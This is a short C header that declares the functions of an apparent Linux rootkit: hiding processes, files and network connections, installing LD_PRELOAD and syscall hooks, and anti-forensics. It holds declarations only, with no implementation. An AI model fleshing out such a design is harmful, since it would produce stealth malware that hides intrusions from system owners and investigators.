#pragma once
#include "includes.h"
void rootkit_init(void);
void rootkit_hide_process(void);
void rootkit_hide_files(void);
void rootkit_hide_network(void);
void rootkit_install_ldpreload(void);
void rootkit_install_syscall_hooks(void);
void rootkit_anti_forensics(void);
void rootkit_setup_ldpreload_hooks(void);
